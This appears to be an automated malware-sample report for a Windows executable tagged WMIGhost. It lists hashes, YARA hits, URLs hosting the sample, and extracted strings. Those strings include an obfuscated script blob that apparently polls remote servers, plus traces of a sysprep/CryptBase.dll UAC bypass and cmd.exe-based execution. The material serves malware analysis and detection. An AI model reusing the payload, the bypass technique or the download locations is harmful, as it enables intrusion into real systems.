
Sample details: 1b83b315b7a729cb685270496ae68802 --

Hashes
MD5: 1b83b315b7a729cb685270496ae68802
SHA1: 8d8d24b25d9102d620038440ce0998e7fc8d0331
SHA256: 05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
SSDEEP: 768:j5QGuIOFwKTMAj3cdXhwlMgiR+hYHAGQ:VsIOFwKT/BlMg5WQ
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Installer_VISE_Custom_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Installer_VISE_Custom | YRP/Armadillo_v4x | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/anti_dbg | YRP/win_files_operation |
Source
http://94.130.104.170/05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
http://94.130.104.170/WMIGhost//05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
http://94.130.104.170/WMIGhost/05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83
Strings
		!This program cannot be run in DOS mode.
Rich0x
`.rdata
@.data
t4hdu@
_9= {@
YYh `@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
t.;t$$t(
VC20XC00U
VWuBh4T@
[ShDT@
"WWSh@T@
^VhDT@
PVh@T@
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
WinExec
GetTempPathA
MoveFileA
DeleteFileA
GetTempFileNameA
GetModuleFileNameA
LockResource
SizeofResource
LoadResource
FindResourceA
CloseHandle
WriteFile
CreateFileA
WaitForSingleObject
CreateProcessA
GetSystemDirectoryA
lstrcatA
GetLastError
KERNEL32.dll
wsprintfA
USER32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapAlloc
HeapFree
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetCurrentThreadId
TlsSetValue
TlsAlloc
SetLastError
TlsGetValue
HeapDestroy
HeapCreate
VirtualFree
RtlUnwind
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
GetProcAddress
LoadLibraryA
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
}nuxortu;~3~7o2`mzi;u&9lruv|voh!`rvk~ihtuzortuW~m~w&rvk~ihtuzo~f:GGGG5GGittoGGhnyhxirkortu97i&\~oTyq~xo3u09!Zxorm~Hxirko^m~uoXtuhnv~i925hkzluruhozux~D32 i5uzv~&9Kity~Hxirko]ruo97i5hxirkoru|~u|ru~&9qzmzhxirko97i5HxirkoO~co&o09mzi;hTlu~i&<90~09< mzi;VZRU&}nuxortu32`?&osrh ?5p~b&<L< ?5h]~~
Niw&hCvwNiw ?5hTlu~i&hTlu~i ?5hCvwNiw&<< ?5tSook&unww ?5tHs~ww&unww ?5tHoi~zv&unww ?5hSthoUzv~&unww ?5hTHObk~&unww ?5hVzxZ
i~hh&unww ?5hNIWKzizv&unww ?5m~ihrtu&<)5+5+< ?5inuorv~&.+++ ?5tLVR&unww ?5Dc&Zxorm~CTyq~xo f VZRU5kitotobk~&`RuroTyq~xoh!}nuxortu32`?5tLVR&\~oTyq~xo3<lruv|voh!`rvk~ihtuzortuW~m~w&rvk~ihtuzo~f:GGGGGGGG5GGGGittoGGGGxrvm)<2 ?5tHs~ww&u~l;?5Dc3<LHxirko5Hs~ww<2 ?5tHoi~zv&u~l;?5Dc3<Z_T_Y5Hoi~zv<2 ?5\~oTHRu}t32 ?5\~oVzxZ
i~hh32 ?5\~u~izo~NiwKzizv32 f7LVR!}nuxortu3hjw2`i~oniu;?5tLVR5^c~xJn~ib3hjw2 f7\~oTHRu}t!}nuxortu32`mzi;~&u~l;^unv~izoti3?5LVR3<H~w~xo;1;}itv;Lru()DTk~izoru|Hbho~v<22 r}3:~5zo^u
322`mzi;ro~v&~5ro~v32 ?5hTHObk~&ro~v5Xzkortu0ro~v5H~imrx~KzxpVzqtiM~ihrtu ?5hSthoUzv~&ro~v5XHUzv~ ff7\~oVzxZ
i~hh!}nuxortu32`mzi;~&u~l;^unv~izoti3?5LVR3<H~w~xo;1;}itv;Lru()DU~oltipZ
zko~i;ls~i~;KUK_~mrx~R_;wrp~;GGG9>KXR>GGG9;zu
;U~oXtuu~xortuHozonh&)<22 r}3:~5zo^u
322`?5hVzxZ
i~hh&~5ro~v325VZXZ
i~hh ff7\~u~izo~NiwKzizv!}nuxortu32`mzi;orv~&u~l;_zo~32 ?5hNIWKzizv&<xhobk~&h~im~i=znosuzv~&h~im~iuzv~=znoskzhh&h~im~ikzhh=sthouzv~&<0?5hSthoUzv~0<=thobk~&<0?5hTHObk~0<=vzxz
i&<0?5hVzxZ
i~hh0<=tlu~i&<0?5hTlu~i0<=m~ihrtu&<0?5m~ihrtu0<=inuorv~&<0?5inuorv~ ?5hNIWKzizv0&<=o&<0orv~5|~oVruno~h320orv~5|~oH~xtu
h32 f7Xw~zuTyq~xoh!}nuxortu32`?5tHs~ww&unww ?5tHoi~zv&unww mzi;~&u~l;^unv~izoti3?5LVR3<H~w~xo;1;}itv;Lru()DKitx~hh;ls~i~;Uzv~&GGG9hxixtuh5~c~GGG9<22 lsrw~3:~5zo^u
322`~5ro~v325o~ivruzo~32 ~5vtm~U~co32 ff7_~xt
~!}nuxortu3htnix~Hoi2`mzi;p~bxt
~&htnix~Hoi5xsziXt
~Zo3+2 mzi;htnix~&htnix~Hoi5hnyhoi3*2 mzi;mzwh&htnix~5hkwro3<7<2 mzi;i~hnwo&<< }ti3mzi;r&+ r'mzwh5w~u|os r002`i~hnwo0&Hoiru|5}itvXsziXt
~3mzwh@rFEp~bxt
~2 fi~oniu;i~hnwo f7xrixw~_~xt
~!}nuxortu3hx2`mzi;yzh~&hx5xsziXt
~Zo3+2 mzi;h&yzh~6() mzi;i&<< }ti3mzi;r&* r'hx5w~u|os r002`mzi;ux&hx5xsziXt
~Zo3r26h6r0* r}3ux'()2`ux&*)-03ux6()2>"/ fi0&Hoiru|5}itvXsziXt
~3ux2 fi~oniu;i f7VzruWttk!}nuxortu32`?5tSook&u~l;?5Dc3<Vrxitht}o5CvwSook<2 mzi;}~~
NiwZiib&?5h]~~
Niw5hkwro3< <2 mzi;hozio&u~l;_zo~32 mzi;tCvw&u~l;Zxorm~CTyq~xo3<VHCVW)5_TV_txnv~uo5(5+<2 }ti3mzi;u&+ u'}~~
NiwZiib5w~u|os u002`mzi;NiwWrho&u~l;Ziizb32 mzi;NIWunv&+ oib`mzi;ohoi&}~~
NiwZiib@uF5vzoxs3<sook!4451$GGGG5ksk<2 r}3ohoi:&unww2`NiwWrho@NIWunv00F&ohoi f~wh~`?5tSook5Tk~u3<\^O<7}~~
NiwZiib@uF7}zwh~2 ?5tSook5h~oI~jn~hoS~z
~i3<Nh~i6Z|~uo<7<Vtarwwz4.5+;3Lru
tlh ;N ;Lru
tlh;UO;.5* ;im!*5"5*2;\~xpt4)++"+-)/;]ri~}tc4(5.<2 ?5tSook5H~u
32 mzi;i~hktuh~&?5tSook5I~hktuh~O~co5i~kwzx~343EGGh12g3GGh1?24|7<<2 mzi;i~&4'orow~%[3512['GG4orow~%04| mzi;orow~Wrho&i~hktuh~5vzoxs3i~2 }ti3mzi;r&+ r'orow~Wrho5w~u|os r002`oib`tCvw5wtz
CVW3orow~Wrho@rF2 mzi;xtuozru~i&tCvw5|~o^w~v~uohYbOz|Uzv~3<orow~<2 mzi;ovkhoi&xtuozru~i@+F5o~co5vzoxs3<[3512[<2 NiwWrho@NIWunv00F&?5xrixw~_~xt
~3ovkhoi@*F2 fxzoxs3~2`fff}ti3mzi;Niwru
~c&+ Niwru
~c'NiwWrho5w~u|os Niwru
~c002`?5hCvwNiw&NiwWrho@Niwru
~cF mzi;inuunv&(-+ lsrw~3inuunv66%+2`?5tSook5Tk~u3<KTHO<7?5hCvwNiw7}zwh~2 ?5tSook5h~oI~jn~hoS~z
~i3<XTUO^UO6OBK^<7<zkkwrxzortu4c6lll6}tiv6niw~uxt
<2 ?5tSook5H~u
3?5hNIWKzizv2 mzi;i~hktuh~&?5tSook5I~hktuh~O~co5i~kwzx~343EGGh12g3GGh1?24|7<<2 r}3i~hktuh~5w~u|os%+2`mzi;xtvvzu
h&unww mzi;xtuozru~i oib`tCvw5wtz
CVW3i~hktuh~2 xtuozru~i&tCvw5|~o^w~v~uohYbOz|Uzv~3<
rm<2 }ti3mzi;r&+ r'xtuozru~i5w~u|os r002`r}3xtuozru~i@rF5|~oZooiryno~3<r
<2&&<+z..)y.z/(.)<2`xtvvzu
h&~mzw3<3<0xtuozru~i@rF5o~co0<2<25xtvvzu
 fffxzoxs3~2`fr}3xtvvzu
h:&unww2`mzi;xtvvzu
i~hnwo&<< }ti3mzi;r&+ r'xtvvzu
h5w~u|os r002`mzi;i~hnwo&<ut;i~hktuh~< oib`i~hnwo&~mzw3?5_~xt
~3xtvvzu
h@rF5mzwn~22 fxzoxs3~2`fr}3r%+2`xtvvzu
i~hnwo0&<7< fxtvvzu
i~hnwo0&<GG<<0xtvvzu
h@rF5r
0<GG<!GG<<0~hxzk~3i~hnwo20<GG<< fr}3xtvvzu
i~hnwo5w~u|os%+2`xtvvzu
i~hnwo&<`<0xtvvzu
i~hnwo0<f< ?5tSook5Tk~u3<KTHO<7?5hCvwNiw7}zwh~2 ?5tSook5h~oI~jn~hoS~z
~i3<XTUO^UO6OBK^<7<zkkwrxzortu4c6lll6}tiv6niw~uxt
<2 ?5tSook5H~u
3?5hNIWKzizv0<=xtvvzu
&i~hnwo=xtvvzu
i~hnwo&<0xtvvzu
i~hnwo2 ff~wh~`?5hCvwNiw&<< inuunv&+ ff?5inuorv~&3u~l;_zo~3225|~oOrv~326hozio5|~oOrv~32 LHxirko5Hw~~k3*++++2 fr}3?5hCvwNiw5w~u|os%+2`i~oniu fffxzoxs3~2`fff7]ri~!}nuxortu32`?5RuroTyq~xoh32 oib`?5VzruWttk32 fxzoxs3~2`f?5Xw~zuTyq~xoh32 ff u~l;VZRU325]ri~32 9 mzi;r&i5KnoD32 i&\~oTyq~xo3u09!DDRuo~imzwOrv~iRuhoinxortu925hkzluruhozux~D327i5Orv~ir
&9Kity~Hxirko]ruo97i5Ruo~imzwY~ol~~u^m~uoh&-~(7i5KnoD327i&\~oTyq~xo3u09!DD^m~uo]rwo~i925hkzluruhozux~D327i5uzv~&9Kity~Hxirko]ruo97i5Jn~ib&<h~w~xo;1;}itv;DDorv~i~m~uo;ls~i~;orv~ir
&9Kity~Hxirko]ruo9<7i5Jn~ibWzu|nz|~&9LJW9 mzi;h&i5KnoD32 i~oniu;i&\~oTyq~xo3u09!DD]rwo~iOtXtuhnv~iYru
ru|925HkzluRuhozux~D327i5Xtuhnv~i&r5kzos7i5]rwo~i&h5kzos7i5KnoD32799f ~39kx97<mzi;hCvwNiw&9sook!44pnvzi#+,5ywt|hkto5xtv4}~~
h4kthoh4
~}znwo sook!44pnvzi#+,5lti
ki~hh5xtv4}~~
4 sook!44pnvzi#+,5wrm~qtniuzw5xtv4
zoz4ihh sook!44ywt|h5i~
r}}5xtv4pnvzi#+,4}~~
4 sook!44pnvzi#+,5ostn|soh5xtv4}~~
 sook!44pnvzi#+,5onvywi5xtv4ihh 9 <2 
gupdate.exe
%s\%s\%s%s %s
cmd.exe
%s\%s /c %s
cmd.exe
%s\%s /c %s
IDR_RESOURCE
gupdate.exe
\cmd.exe
IDR_RESOURCE
IDR_RESOURCE
\cmd.exe
%s%s.dll.cab
wusa.exe
/c %s %s /quiet /extract:%s\%s\
sysprep
CryptBase
SysNative
%s\%s\%s%s
%s\%s\%s%s
CryptBase.dll
kp,s{h
CryptBase.dll
85&?)+
!This program cannot be run in DOS mode.
`.rdata
@.data
DeleteFileA
InitializeCriticalSection
DeleteCriticalSection
OutputDebugStringA
LeaveCriticalSection
CloseHandle
SetFileTime
SystemTimeToFileTime
GetSystemTime
WriteFile
SetFilePointer
CreateFileA
GetSystemDirectoryA
EnterCriticalSection
GetFileAttributesA
MultiByteToWideChar
InterlockedDecrement
WaitForSingleObject
CreateProcessA
MoveFileA
GetTempPathA
GetModuleFileNameA
KERNEL32.dll
strlen
strcat
sprintf
_strtime
_vsnprintf
??2@YAPAXI@Z
__CxxFrameHandler
??3@YAXPAX@Z
memset
_beginthread
malloc
strcpy
MSVCRT.dll
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
CoInitialize
CoCreateInstance
ole32.dll
OLEAUT32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
GetModuleHandleA
GetStartupInfoA
LocalFree
_CxxThrowException
??1type_info@@UAE@XZ
aaaaaaaa
YYYYYYYYYYYYYYYY
[%s] - %s
\httpcom.log
Script Error
Run OK
create process:%s
process[%s] end
.?AV_com_error@@
.?AVtype_info@@